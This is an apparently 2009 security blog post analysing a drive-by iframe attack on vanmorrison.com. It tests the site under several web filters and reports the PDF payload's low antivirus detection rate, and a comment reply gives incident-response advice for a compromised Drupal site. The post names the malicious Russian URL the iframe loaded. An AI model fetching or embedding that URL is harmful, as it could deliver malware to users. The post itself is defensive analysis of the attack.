VanMorrison.com Iframe

Saw a virus alert today. A user performed an AOL Search (that alone should be banned in our end user behavior policy) on “van morrison” (another termination offense). He/She clicked on a link for www.vanmorrison.com. The antivirus detected an iframe attack.
Manually looking at www.vanmorrison.com’s source, I currently see a iframe loading ‘http://iqsp.ru:8080/index.php’. Perhaps someone can remind me, aren’t there sites like virus total where you can send them a link and they’ll tell you what’s up. I haven’t yet learned javascript deobfuscation but that didn’t look like good stuff was happening.
So I took a sacrificial lamb system. (still dangerous don’t try this at home). And went to www.vanmorrison.com using various security systems to see what the result was.
Bluecoat – detected the virus on the site. Blocked Access to the entire site.
Scansafe – detected the virus on the site. blocked access to the entire site.
Purewire – site loaded. Wanted me to install Flash (seemed legit but I didn’t do it). Java started up. I was prompted to download a file and run a ActiveX control. I chose not to install the ActiveX control but I did download the file. It was a pdf file.
Virus total saw the pdf file first on October 16th (today is the 21st). Currently 13 out of 41 venders are detecting this as a virus. Did I mention signature detection is dead dead dead.
Did you notice the link to the Russian site is on port 8080? I wonder how many HTTP security implementation are proxying 8080 traffic in addition to 80.
Update 10/23/09
I see Sophos and eweek have linked to this article. Thanks!
Pob is correct, the infection changed after I posted this entry. I went back yesterday to see if anyone cleaned it. I found the site on Google’s naughty list and the site had obfuscated code like he screenshots. Didn’t check on it today.

5 Comments

  1. Hi my website was being attack also this morning.
    I google the ‘http://iqsp.ru:8080/index.php’ and found your site.
    The code was inject to my index.php by hard coded.
    I am using drupal cms.
    Did you have any idea how it was injected?
    I am really weak in security part.

  2. This can happen many ways.
    The first thing I’d do is see if my host keeps FTP logs. Look for any FTP connections to your site by someone besides you. A lot of web hosts don’t provide that but you can see the last IP to use FTP. So as long as you haven’t FTPed in yourself, you could log into your management panel and see if a unfamiliar IP address was the last to use FTP. That would indicate they broken in using your FTP password.
    Bad guys do this crap on websites if they can guess the password for an account. Othertimes if a password is saved on your computer, and your computer has a virus they can get your password that way.
    If they didn’t get in using your FTP account, the next most likely method of infection is a vulnerability in your website content management software. In your case you need to make sure you’ve kept Drupal (and any plugins) patched.
    Drupal logs and your http logs can be big hints as to exactly how this transpired.
    Of course you could have your site modified due to insecurities in your web hosts code. Usually people blame this first, but I think its wise to look at youself first. Don’t point fingers at the host. But if everyone had their page modified (not just those running Drupal) then its probably them.
    How to fix it is the next question. it can be as simple as removing the offending code. If they compromised Drupal you need to make sure they didn’t create any new admin accounts for themselves. Who knows what other surprises may lurk.
    This could be a blog entry of its own, but since its a blog comment I can be a bit more stream of consciousness.

Comments are closed.